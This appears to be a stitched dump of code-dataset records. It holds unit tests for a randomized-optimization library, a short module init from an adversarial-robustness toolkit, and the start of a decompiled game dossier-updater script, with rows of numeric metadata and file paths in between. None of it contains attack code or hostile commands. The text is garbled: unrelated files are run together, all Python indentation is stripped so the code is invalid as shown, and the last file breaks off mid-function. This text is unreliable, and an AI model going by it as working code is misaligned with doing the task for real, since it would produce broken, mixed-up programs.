fitness = problem.eval_fitness(x)
assert fitness == 10
@staticmethod
def test_eval_fitness_min():
"""Test eval_fitness method for a minimization problem"""
problem = OptProb(5, OneMax(), maximize=False)
x = np.array([0, 1, 2, 3, 4])
fitness = problem.eval_fitness(x)
assert fitness == -10
@staticmethod
def test_eval_mate_probs():
"""Test eval_mate_probs method"""
problem = OptProb(5, OneMax(), maximize=True)
pop = np.array([[0, 0, 0, 0, 1],
[1, 0, 1, 0, 1],
[1, 1, 1, 1, 0],
[1, 0, 0, 0, 1],
[0, 0, 0, 0, 0],
[1, 1, 1, 1, 1]])
problem.set_population(pop)
problem.eval_mate_probs()
probs = np.array([0.06667, 0.2, 0.26667, 0.13333, 0, 0.33333])
assert np.allclose(problem.get_mate_probs(), probs, atol=0.00001)
@staticmethod
def test_eval_mate_probs_maximize_false():
"""Test eval_mate_probs method"""
problem = OptProb(5, OneMax(), maximize=False)
pop = np.array([[0, 0, 0, 0, 1],
[1, 0, 1, 0, 1],
[1, 1, 1, 1, 0],
[1, 0, 0, 0, 1],
[0, 0, 0, 0, 0],
[1, 1, 1, 1, 1]])
problem.set_population(pop)
problem.eval_mate_probs()
probs = np.array([0.26667, 0.13333, 0.06667, 0.2, 0.33333, 0])
assert np.allclose(problem.get_mate_probs(), probs, atol=0.00001)
@staticmethod
def test_eval_mate_probs_all_zero():
"""Test eval_mate_probs method when all states have zero fitness"""
problem = OptProb(5, OneMax(), maximize=True)
pop = np.array([[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0]])
problem.set_population(pop)
problem.eval_mate_probs()
probs = np.array([0.16667, 0.16667, 0.16667, 0.16667,
0.16667, 0.16667])
assert np.allclose(problem.get_mate_probs(), probs, atol=0.00001)
class TestDiscreteOpt(unittest.TestCase):
"""Tests for DiscreteOpt class."""
@staticmethod
def test_eval_node_probs():
"""Test eval_node_probs method"""
problem = DiscreteOpt(5, OneMax(), maximize=True)
pop = np.array([[0, 0, 0, 0, 1],
[1, 0, 1, 0, 1],
[1, 1, 1, 1, 0],
[1, 0, 0, 0, 1],
[0, 0, 0, 0, 0],
[1, 1, 1, 1, 1]])
problem.keep_sample = pop
problem.eval_node_probs()
parent = np.array([2, 0, 1, 0])
probs = np.array([[[0.33333, 0.66667],
[0.33333, 0.66667]],
[[1.0, 0.0],
[0.33333, 0.66667]],
[[1.0, 0.0],
[0.25, 0.75]],
[[1.0, 0.0],
[0.0, 1.0]],
[[0.5, 0.5],
[0.25, 0.75]]])
assert (np.allclose(problem.node_probs, probs, atol=0.00001)
and np.array_equal(problem.parent_nodes, parent))
@staticmethod
def test_find_neighbors_max2():
"""Test find_neighbors method when max_val is equal to 2"""
problem = DiscreteOpt(5, OneMax(), maximize=True, max_val=2)
x = np.array([0, 1, 0, 1, 0])
problem.set_state(x)
problem.find_neighbors()
neigh = np.array([[1, 1, 0, 1, 0],
[0, 0, 0, 1, 0],
[0, 1, 1, 1, 0],
[0, 1, 0, 0, 0],
[0, 1, 0, 1, 1]])
assert np.array_equal(np.array(problem.neighbors), neigh)
@staticmethod
def test_find_neighbors_max_gt2():
"""Test find_neighbors method when max_val is greater than 2"""
problem = DiscreteOpt(5, OneMax(), maximize=True, max_val=3)
x = np.array([0, 1, 2, 1, 0])
problem.set_state(x)
problem.find_neighbors()
neigh = np.array([[1, 1, 2, 1, 0],
[2, 1, 2, 1, 0],
[0, 0, 2, 1, 0],
[0, 2, 2, 1, 0],
[0, 1, 0, 1, 0],
[0, 1, 1, 1, 0],
[0, 1, 2, 0, 0],
[0, 1, 2, 2, 0],
[0, 1, 2, 1, 1],
[0, 1, 2, 1, 2]])
assert np.array_equal(np.array(problem.neighbors), neigh)
@staticmethod
def test_find_sample_order():
"""Test find_sample_order method"""
problem = DiscreteOpt(5, OneMax(), maximize=True)
problem.parent_nodes = np.array([2, 0, 1, 0])
order = np.array([0, 2, 4, 1, 3])
problem.find_sample_order()
assert np.array_equal(np.array(problem.sample_order), order)
@staticmethod
def test_find_top_pct_max():
"""Test find_top_pct method for a maximization problem"""
problem = DiscreteOpt(5, OneMax(), maximize=True)
pop = np.array([[0, 0, 0, 0, 1],
[1, 0, 1, 0, 1],
[1, 1, 1, 1, 0],
[1, 0, 0, 0, 1],
[100, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[1, 1, 1, 1, 1],
[0, 0, 0, 0, -50]])
problem.set_population(pop)
problem.find_top_pct(keep_pct=0.25)
x = np.array([[100, 0, 0, 0, 0],
[1, 1, 1, 1, 1]])
assert np.array_equal(problem.get_keep_sample(), x)
@staticmethod
def test_find_top_pct_min():
"""Test find_top_pct method for a minimization problem"""
problem = DiscreteOpt(5, OneMax(), maximize=False)
pop = np.array([[0, 0, 0, 0, 1],
[1, 0, 1, 0, 1],
[1, 1, 1, 1, 0],
[1, 0, 0, 0, 1],
[100, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[1, 1, 1, 1, 1],
[0, 0, 0, 0, -50]])
problem.set_population(pop)
problem.find_top_pct(keep_pct=0.25)
x = np.array([[0, 0, 0, 0, 0],
[0, 0, 0, 0, -50]])
assert np.array_equal(problem.get_keep_sample(), x)
@staticmethod
def test_random():
"""Test random method"""
problem = DiscreteOpt(5, OneMax(), maximize=True, max_val=5)
rand = problem.random()
assert (len(rand) == 5 and max(rand) >= 0 and min(rand) <= 4)
@staticmethod
def test_random_neighbor_max2():
"""Test random_neighbor method when max_val is equal to 2"""
problem = DiscreteOpt(5, OneMax(), maximize=True)
x = np.array([0, 0, 1, 1, 1])
problem.set_state(x)
neigh = problem.random_neighbor()
sum_diff = np.sum(np.abs(x - neigh))
assert (len(neigh) == 5 and sum_diff == 1)
@staticmethod
def test_random_neighbor_max_gt2():
"""Test random_neighbor method when max_val is greater than 2"""
problem = DiscreteOpt(5, OneMax(), maximize=True, max_val=5)
x = np.array([0, 1, 2, 3, 4])
problem.set_state(x)
neigh = problem.random_neighbor()
abs_diff = np.abs(x - neigh)
abs_diff[abs_diff > 0] = 1
sum_diff = np.sum(abs_diff)
assert (len(neigh) == 5 and sum_diff == 1)
@staticmethod
def test_random_pop():
"""Test random_pop method"""
problem = DiscreteOpt(5, OneMax(), maximize=True)
problem.random_pop(100)
pop = problem.get_population()
pop_fitness = problem.get_pop_fitness()
assert (np.shape(pop)[0] == 100 and np.shape(pop)[1] == 5
and np.sum(pop) > 0 and np.sum(pop) < 500
and len(pop_fitness) == 100)
@staticmethod
def test_reproduce_mut0():
"""Test reproduce method when mutation_prob is 0"""
problem = DiscreteOpt(5, OneMax(), maximize=True)
father = np.array([0, 0, 0, 0, 0])
mother = np.array([1, 1, 1, 1, 1])
child = problem.reproduce(father, mother, mutation_prob=0)
assert (len(child) == 5 and sum(child) >= 0 and sum(child) <= 5)
@staticmethod
def test_reproduce_mut1_max2():
"""Test reproduce method when mutation_prob is 1 and max_val is 2"""
problem = DiscreteOpt(5, OneMax(), maximize=True)
father = np.array([0, 0, 0, 0, 0])
mother = np.array([1, 1, 1, 1, 1])
child = problem.reproduce(father, mother, mutation_prob=1)
assert (len(child) == 5 and sum(child) >= 0 and sum(child) <= 5)
@staticmethod
def test_reproduce_mut1_max_gt2():
"""Test reproduce method when mutation_prob is 1 and max_val is
greater than 2"""
problem = DiscreteOpt(5, OneMax(),
maximize=True,
max_val=3)
problem._crossover = OnePointCrossOver(problem)
father = np.array([0, 0, 0, 0, 0])
mother = np.array([2, 2, 2, 2, 2])
child = problem.reproduce(father, mother, mutation_prob=1)
assert (len(child) == 5 and sum(child) > 0 and sum(child) < 10)
@staticmethod
def test_sample_pop():
"""Test sample_pop method"""
problem = DiscreteOpt(5, OneMax(), maximize=True)
pop = np.array([[0, 0, 0, 0, 1],
[1, 0, 1, 0, 1],
[1, 1, 1, 1, 0],
[1, 0, 0, 0, 1],
[0, 0, 0, 0, 0],
[1, 1, 1, 1, 1]])
problem.keep_sample = pop
problem.eval_node_probs()
sample = problem.sample_pop(100)
assert (np.shape(sample)[0] == 100 and np.shape(sample)[1] == 5
and np.sum(sample) > 0 and np.sum(sample) < 500)
class TestContinuousOpt(unittest.TestCase):
"""Tests for ContinuousOpt class."""
@staticmethod
def test_calculate_updates():
"""Test calculate_updates method"""
X = np.array([[0, 1, 0, 1],
[0, 0, 0, 0],
[1, 1, 1, 1],
[1, 1, 1, 1],
[0, 0, 1, 1],
[1, 0, 0, 0]])
y = np.reshape(np.array([1, 1, 0, 0, 1, 1]), [6, 1])
nodes = [4, 2, 1]
fitness = NetworkWeights(X, y, nodes, activation=identity,
bias=False, is_classifier=False,
learning_rate=1)
a = list(np.arange(8) + 1)
b = list(0.01*(np.arange(2) + 1))
weights = a + b
fitness.evaluate(weights)
problem = ContinuousOpt(10, fitness, maximize=False)
updates = problem.calculate_updates()
update1 = np.array([[-0.0017, -0.0034],
[-0.0046, -0.0092],
[-0.0052, -0.0104],
[0.0014, 0.0028]])
update2 = np.array([[-3.17],
[-4.18]])
assert (np.allclose(updates[0], update1, atol=0.001)
and np.allclose(updates[1], update2, atol=0.001))
@staticmethod
def test_find_neighbors_range_eq_step():
"""Test find_neighbors method when range equals step size"""
problem = ContinuousOpt(5, OneMax(), maximize=True,
min_val=0, max_val=1, step=1)
x = np.array([0, 1, 0, 1, 0])
problem.set_state(x)
problem.find_neighbors()
neigh = np.array([[1, 1, 0, 1, 0],
[0, 0, 0, 1, 0],
[0, 1, 1, 1, 0],
[0, 1, 0, 0, 0],
[0, 1, 0, 1, 1]])
assert np.array_equal(np.array(problem.neighbors), neigh)
@staticmethod
def test_find_neighbors_range_gt_step():
"""Test find_neighbors method when range greater than step size"""
problem = ContinuousOpt(5, OneMax(), maximize=True,
min_val=0, max_val=2, step=1)
x = np.array([0, 1, 2, 1, 0])
problem.set_state(x)
problem.find_neighbors()
neigh = np.array([[1, 1, 2, 1, 0],
[0, 0, 2, 1, 0],
[0, 2, 2, 1, 0],
[0, 1, 1, 1, 0],
[0, 1, 2, 0, 0],
[0, 1, 2, 2, 0],
[0, 1, 2, 1, 1]])
assert np.array_equal(np.array(problem.neighbors), neigh)
@staticmethod
def test_random():
"""Test random method"""
problem = ContinuousOpt(5, OneMax(), maximize=True,
min_val=0, max_val=4)
rand = problem.random()
assert (len(rand) == 5 and max(rand) >= 0 and min(rand) <= 4)
@staticmethod
def test_random_neighbor_range_eq_step():
"""Test random_neighbor method when range equals step size"""
problem = ContinuousOpt(5, OneMax(), maximize=True,
min_val=0, max_val=1, step=1)
x = np.array([0, 0, 1, 1, 1])
problem.set_state(x)
neigh = problem.random_neighbor()
sum_diff = np.sum(np.abs(x - neigh))
assert (len(neigh) == 5 and sum_diff == 1)
@staticmethod
def test_random_neighbor_range_gt_step():
"""Test random_neighbor method when range greater than step size"""
problem = ContinuousOpt(5, OneMax(), maximize=True,
min_val=0, max_val=2, step=1)
x = np.array([0, 1, 2, 3, 4])
problem.set_state(x)
neigh = problem.random_neighbor()
abs_diff = np.abs(x - neigh)
abs_diff[abs_diff > 0] = 1
sum_diff = np.sum(abs_diff)
assert (len(neigh) == 5 and sum_diff == 1)
@staticmethod
def test_random_pop():
"""Test random_pop method"""
problem = ContinuousOpt(5, OneMax(), maximize=True,
min_val=0, max_val=1, step=1)
problem.random_pop(100)
pop = problem.get_population()
pop_fitness = problem.get_pop_fitness()
assert (np.shape(pop)[0] == 100 and np.shape(pop)[1] == 5
and np.sum(pop) > 0 and np.sum(pop) < 500
and len(pop_fitness) == 100)
@staticmethod
def test_reproduce_mut0():
"""Test reproduce method when mutation_prob is 0"""
problem = ContinuousOpt(5, OneMax(), maximize=True,
min_val=0, max_val=1, step=1)
father = np.array([0, 0, 0, 0, 0])
mother = np.array([1, 1, 1, 1, 1])
child = problem.reproduce(father, mother, mutation_prob=0)
assert (len(child) == 5 and sum(child) > 0 and sum(child) < 5)
@staticmethod
def test_reproduce_mut1_range_eq_step():
"""Test reproduce method when mutation_prob is 1 and range equals
step size"""
problem = ContinuousOpt(5, OneMax(), maximize=True,
min_val=0, max_val=1, step=1)
father = np.array([0, 0, 0, 0, 0])
mother = np.array([1, 1, 1, 1, 1])
child = problem.reproduce(father, mother, mutation_prob=1)
assert (len(child) == 5 and sum(child) > 0 and sum(child) < 5)
@staticmethod
def test_reproduce_mut1_range_gt_step():
"""Test reproduce method when mutation_prob is 1 and range is
greater than step size"""
problem = ContinuousOpt(5, OneMax(), maximize=True,
min_val=0, max_val=2, step=1)
father = np.array([0, 0, 0, 0, 0])
mother = np.array([2, 2, 2, 2, 2])
child = problem.reproduce(father, mother, mutation_prob=1)
assert (len(child) == 5 and sum(child) > 0 and sum(child) < 10)
@staticmethod
def test_update_state_in_range():
"""Test update_state method where all updated values are within the
tolerated range"""
problem = ContinuousOpt(5, OneMax(), maximize=True,
min_val=0, max_val=20, step=1)
x = np.array([0, 1, 2, 3, 4])
problem.set_state(x)
y = np.array([2, 4, 6, 8, 10])
updated = problem.update_state(y)
assert np.array_equal(updated, (x + y))
@staticmethod
def test_update_state_outside_range():
"""Test update_state method where some updated values are outside the
tolerated range"""
problem = ContinuousOpt(5, OneMax(), maximize=True,
min_val=0, max_val=5, step=1)
x = np.array([0, 1, 2, 3, 4])
problem.set_state(x)
y = np.array([2, -4, 6, -8, 10])
updated = problem.update_state(y)
z = np.array([2, 0, 5, 0, 5])
assert np.array_equal(updated, z)
class TestTSPOpt(unittest.TestCase):
"""Tests for TSPOpt class."""
@staticmethod
def test_adjust_probs_all_zero():
"""Test adjust_probs method when all elements in input vector sum to
zero."""
dists = [(0, 1, 3), (0, 2, 5), (0, 3, 1), (0, 4, 7), (1, 3, 6),
(4, 1, 9), (2, 3, 8), (2, 4, 2), (3, 2, 8), (3, 4, 4)]
problem = TSPOpt(5, distances=dists)
probs = np.zeros(5)
assert np.array_equal(problem.adjust_probs(probs), np.zeros(5))
@staticmethod
def test_adjust_probs_non_zero():
"""Test adjust_probs method when all elements in input vector sum to
some value other than zero."""
dists = [(0, 1, 3), (0, 2, 5), (0, 3, 1), (0, 4, 7), (1, 3, 6),
(4, 1, 9), (2, 3, 8), (2, 4, 2), (3, 2, 8), (3, 4, 4)]
problem = TSPOpt(5, distances=dists)
probs = np.array([0.1, 0.2, 0, 0, 0.5])
x = np.array([0.125, 0.25, 0, 0, 0.625])
assert np.array_equal(problem.adjust_probs(probs), x)
@staticmethod
def test_find_neighbors():
"""Test find_neighbors method"""
dists = [(0, 1, 3), (0, 2, 5), (0, 3, 1), (0, 4, 7), (1, 3, 6),
(4, 1, 9), (2, 3, 8), (2, 4, 2), (3, 2, 8), (3, 4, 4)]
problem = TSPOpt(5, distances=dists)
x = np.array([0, 1, 2, 3, 4])
problem.set_state(x)
problem.find_neighbors()
neigh = np.array([[1, 0, 2, 3, 4],
[2, 1, 0, 3, 4],
[3, 1, 2, 0, 4],
[4, 1, 2, 3, 0],
[0, 2, 1, 3, 4],
[0, 3, 2, 1, 4],
[0, 4, 2, 3, 1],
[0, 1, 3, 2, 4],
[0, 1, 4, 3, 2],
[0, 1, 2, 4, 3]])
assert np.array_equal(np.array(problem.neighbors), neigh)
@staticmethod
def test_random():
"""Test random method"""
dists = [(0, 1, 3), (0, 2, 5), (0, 3, 1), (0, 4, 7), (1, 3, 6),
(4, 1, 9), (2, 3, 8), (2, 4, 2), (3, 2, 8), (3, 4, 4)]
problem = TSPOpt(5, distances=dists)
rand = problem.random()
assert (len(rand) == 5 and len(set(rand)) == 5)
@staticmethod
def test_random_mimic():
"""Test random_mimic method"""
dists = [(0, 1, 3), (0, 2, 5), (0, 3, 1), (0, 4, 7), (1, 3, 6),
(4, 1, 9), (2, 3, 8), (2, 4, 2), (3, 2, 8), (3, 4, 4)]
pop = np.array([[1, 0, 3, 2, 4],
[0, 2, 1, 3, 4],
[0, 2, 4, 3, 1],
[4, 1, 3, 2, 0],
[3, 4, 0, 2, 1],
[2, 4, 0, 3, 1]])
problem = TSPOpt(5, distances=dists)
problem.keep_sample = pop
problem.eval_node_probs()
problem.find_sample_order()
rand = problem.random_mimic()
assert (len(rand) == 5 and len(set(rand)) == 5)
@staticmethod
def test_random_neighbor():
"""Test random_neighbor method"""
dists = [(0, 1, 3), (0, 2, 5), (0, 3, 1), (0, 4, 7), (1, 3, 6),
(4, 1, 9), (2, 3, 8), (2, 4, 2), (3, 2, 8), (3, 4, 4)]
problem = TSPOpt(5, distances=dists)
x = np.array([0, 1, 2, 3, 4])
problem.set_state(x)
neigh = problem.random_neighbor()
abs_diff = np.abs(x - neigh)
abs_diff[abs_diff > 0] = 1
sum_diff = np.sum(abs_diff)
assert (len(neigh) == 5 and sum_diff == 2 and len(set(neigh)) == 5)
@staticmethod
def test_reproduce_mut0():
"""Test reproduce method when mutation_prob is 0"""
dists = [(0, 1, 3), (0, 2, 5), (0, 3, 1), (0, 4, 7), (1, 3, 6),
(4, 1, 9), (2, 3, 8), (2, 4, 2), (3, 2, 8), (3, 4, 4)]
problem = TSPOpt(5, distances=dists)
father = np.array([0, 1, 2, 3, 4])
mother = np.array([0, 4, 3, 2, 1])
child = problem.reproduce(father, mother, mutation_prob=0)
assert (len(child) == 5 and len(set(child)) == 5)
@staticmethod
def test_reproduce_mut1():
"""Test reproduce method when mutation_prob is 1"""
dists = [(0, 1, 3), (0, 2, 5), (0, 3, 1), (0, 4, 7), (1, 3, 6),
(4, 1, 9), (2, 3, 8), (2, 4, 2), (3, 2, 8), (3, 4, 4)]
problem = TSPOpt(5, distances=dists)
father = np.array([0, 1, 2, 3, 4])
mother = np.array([4, 3, 2, 1, 0])
child = problem.reproduce(father, mother, mutation_prob=1)
assert (len(child) == 5 and len(set(child)) == 5)
@staticmethod
def test_sample_pop():
"""Test sample_pop method"""
dists = [(0, 1, 3), (0, 2, 5), (0, 3, 1), (0, 4, 7), (1, 3, 6),
(4, 1, 9), (2, 3, 8), (2, 4, 2), (3, 2, 8), (3, 4, 4)]
pop = np.array([[1, 0, 3, 2, 4],
[0, 2, 1, 3, 4],
[0, 2, 4, 3, 1],
[4, 1, 3, 2, 0],
[3, 4, 0, 2, 1],
[2, 4, 0, 3, 1]])
problem = TSPOpt(5, distances=dists)
problem.keep_sample = pop
problem.eval_node_probs()
sample = problem.sample_pop(100)
row_sums = np.sum(sample, axis=1)
assert (np.shape(sample)[0] == 100 and np.shape(sample)[1] == 5
and max(row_sums) == 10 and min(row_sums) == 10)
if __name__ == '__main__':
unittest.main()
| 31.560758
| 86
| 0.473508
| 3,824
| 28,310
| 3.393044
| 0.055178
| 0.046089
| 0.047861
| 0.041619
| 0.847707
| 0.811407
| 0.780655
| 0.765934
| 0.740347
| 0.729094
| 0
| 0.10344
| 0.375768
| 28,310
| 896
| 87
| 31.595982
| 0.630772
| 0.094207
| 0
| 0.746924
| 0
| 0
| 0.000395
| 0
| 0
| 0
| 0
| 0
| 0.084359
| 1
| 0.084359
| false
| 0
| 0.01406
| 0
| 0.105448
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
86dd5ed0a9570edf7fd001d0e6cbd14f20a6a062
| 227
|
py
|
Python
|
art/estimators/generation/__init__.py
|
synergit/adversarial-robustness-toolbox
|
192c4beda1f66776f6ede94a11808eb7b4651f01
|
[
"MIT"
] | null | null | null |
art/estimators/generation/__init__.py
|
synergit/adversarial-robustness-toolbox
|
192c4beda1f66776f6ede94a11808eb7b4651f01
|
[
"MIT"
] | null | null | null |
art/estimators/generation/__init__.py
|
synergit/adversarial-robustness-toolbox
|
192c4beda1f66776f6ede94a11808eb7b4651f01
|
[
"MIT"
] | null | null | null |
"""
Generator API.
"""
from art.estimators.generation.generator import GeneratorMixin
from art.estimators.generation.tensorflow import TensorFlowGenerator
from art.estimators.generation.tensorflow import TensorFlowV2Generator
| 28.375
| 70
| 0.854626
| 23
| 227
| 8.434783
| 0.478261
| 0.108247
| 0.262887
| 0.417526
| 0.443299
| 0.443299
| 0
| 0
| 0
| 0
| 0
| 0.004762
| 0.07489
| 227
| 7
| 71
| 32.428571
| 0.919048
| 0.061674
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
86e8b5366f41139f551c4f1b0b9c7146d9c0b1a0
| 114,055
|
py
|
Python
|
.OLD_FILES/dossiers2_old2/custom/updaters.py
|
KIHestad/WoT-Dossier-Parser-Create-Struct
|
9eadeeead59b7b6cf78dc6a1e1e89fe2dffb260e
|
[
"MIT"
] | null | null | null |
.OLD_FILES/dossiers2_old2/custom/updaters.py
|
KIHestad/WoT-Dossier-Parser-Create-Struct
|
9eadeeead59b7b6cf78dc6a1e1e89fe2dffb260e
|
[
"MIT"
] | null | null | null |
.OLD_FILES/dossiers2_old2/custom/updaters.py
|
KIHestad/WoT-Dossier-Parser-Create-Struct
|
9eadeeead59b7b6cf78dc6a1e1e89fe2dffb260e
|
[
"MIT"
] | 2
|
2021-11-10T19:12:57.000Z
|
2022-03-13T10:04:48.000Z
|
# uncompyle6 version 3.1.0
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.10 (default, May 23 2015, 09:40:32) [MSC v.1500 32 bit (Intel)]
# Embedded file name: scripts/common/dossiers2/custom/updaters.py
import sys, struct
from functools import partial
from dossiers2.common.updater_utils import getNewStaticSizeBlockValues, getStaticSizeBlockRecordValues
from dossiers2.common.updater_utils import getNewBinarySetBlockValues, setStaticSizeBlockRecordValues
from dossiers2.common.updater_utils import addBlock, removeBlock, addRecords, removeRecords, setVersion
from dossiers2.common.updater_utils import getHeader, getBlockSize, getBlockCompDescr, setBlockCompDescr
import dossiers2.custom.tankmen_dossier1_updater
from VersionUpdater import VersionUpdaterBase
from wotdecorators import singleton
from debug_utils import LOG_DEBUG_DEV
from soft_exception import SoftException
ACCOUNT_DOSSIER_VERSION = 110
ACCOUNT_DOSSIER_UPDATE_FUNCTION_TEMPLATE = '__updateFromAccountDossier%d'
VEHICLE_DOSSIER_VERSION = 100
VEHICLE_DOSSIER_UPDATE_FUNCTION_TEMPLATE = '__updateFromVehicleDossier%d'
TANKMAN_DOSSIER_VERSION = 66
TANKMAN_DOSSIER_UPDATE_FUNCTION_TEMPLATE = '__updateFromTankmanDossier%d'
CLAN_DOSSIER_VERSION = 1
CLAN_DOSSIER_UPDATE_FUNCTION_TEMPLATE = '__updateFromClanDossier%d'
RATED7X7_DOSSIER_VERSION = 1
RATED7X7_DOSSIER_UPDATE_FUNCTION_TEMPLATE = '__updateFromRated7x7Dossier%d'
CLUB_DOSSIER_VERSION = 2
CLUB_DOSSIER_UPDATE_FUNCTION_TEMPLATE = '__updateFromClubDossier%d'
def __updateFromAccountDossier64(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'a15x15Cut', 'rareAchievements']
a15x15packing = {'creationTime': (0, 'I'),'battleLifeTime': (8, 'I'),'lastBattleTime': (4, 'I')}
a15x15_2packing = {'mileage': (38, 'I'),'treesCut': (36, 'H')}
achievementsPacking = {'maxXPVehicle': (136, 'I'),'maxFrags': (0, 'B'),'maxXP': (1, 'H'),'winAndSurvived': (3, 'I'),
'maxFragsVehicle': (140, 'I'),'frags8p': (7, 'I')}
totalLayout = [
('creationTime', 'I'), ('lastBattleTime', 'I'), ('battleLifeTime', 'I'),
('treesCut', 'H'), ('mileage', 'I')]
max15x15Layout = [
('maxXP', 'H'), ('maxFrags', 'B'), ('maxDamage', 'H'),
('maxXPVehicle', 'I'), ('maxFragsVehicle', 'I'), ('maxDamageVehicle', 'I')]
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
totalDefaults = getStaticSizeBlockRecordValues(updateCtx, 'a15x15', a15x15packing)
totalDefaults.update(getStaticSizeBlockRecordValues(updateCtx, 'a15x15_2', a15x15_2packing))
if bool(totalDefaults):
blockFormat, blockValues = getNewStaticSizeBlockValues(totalLayout, totalDefaults)
else:
blockFormat, blockValues = ('', None)
addBlock(updateCtx, 'total', blockFormat, blockValues)
removeRecords(updateCtx, 'a15x15', a15x15packing)
removeRecords(updateCtx, 'a15x15_2', a15x15_2packing)
addBlock(updateCtx, 'a7x7Cut')
achievementsValues = getStaticSizeBlockRecordValues(updateCtx, 'achievements', achievementsPacking)
addRecords(updateCtx, 'a15x15', [
('winAndSurvived', 'I'), ('frags8p', 'I')], achievementsValues)
addRecords(updateCtx, 'a7x7', [
('winAndSurvived', 'I'), ('frags8p', 'I')], {})
if bool(achievementsValues):
blockFormat, blockValues = getNewStaticSizeBlockValues(max15x15Layout, achievementsValues)
else:
blockFormat, blockValues = ('', None)
addBlock(updateCtx, 'max15x15', blockFormat, blockValues)
addBlock(updateCtx, 'max7x7')
removeRecords(updateCtx, 'achievements', achievementsPacking)
setVersion(updateCtx, 65)
return (
65, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier65(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut',
'max15x15', 'max7x7']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addRecords(updateCtx, 'achievements', [('sniper2', 'H'), ('mainGun', 'H')], {})
setVersion(updateCtx, 66)
return (
66, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier66(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut',
'max15x15', 'max7x7']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
blockFormat = '<' + 'HHHHHHHH'
blockValues = [0] * 8
addBlock(updateCtx, 'achievements7x7', blockFormat, blockValues)
setVersion(updateCtx, 67)
return (
67, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier67(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut',
'max15x15', 'max7x7', 'achievements7x7']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addRecords(updateCtx, 'achievements7x7', [('tacticalBreakthrough', 'B')], {'tacticalBreakthrough': 0})
setVersion(updateCtx, 68)
return (
68, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier68(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut',
'max15x15', 'max7x7', 'achievements7x7']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
formats = [
('battleCitizen', 'B')]
addRecords(updateCtx, 'achievements', formats, {})
setVersion(updateCtx, 69)
return (
69, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier69(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut',
'max15x15', 'max7x7', 'achievements7x7']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
recordFormats = [
('potentialDamageReceived', 'I'), ('damageBlockedByArmor', 'I')]
addRecords(updateCtx, 'a15x15_2', recordFormats, {})
addRecords(updateCtx, 'company2', recordFormats, {})
addRecords(updateCtx, 'clan2', recordFormats, {})
addRecords(updateCtx, 'a7x7', recordFormats, {})
setVersion(updateCtx, 70)
return (
70, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier70(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut',
'max15x15', 'max7x7', 'achievements7x7']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
recordFormats = [
('battlesCountBefore9_0', 'I')]
a15x15packing = {'battlesCount': (4, 'I')}
a15x15defaults = getStaticSizeBlockRecordValues(updateCtx, 'a15x15', a15x15packing)
addRecords(updateCtx, 'a15x15', recordFormats, {'battlesCountBefore9_0': a15x15defaults.get('battlesCount', 0)})
companyPacking = {'battlesCount': (4, 'I')}
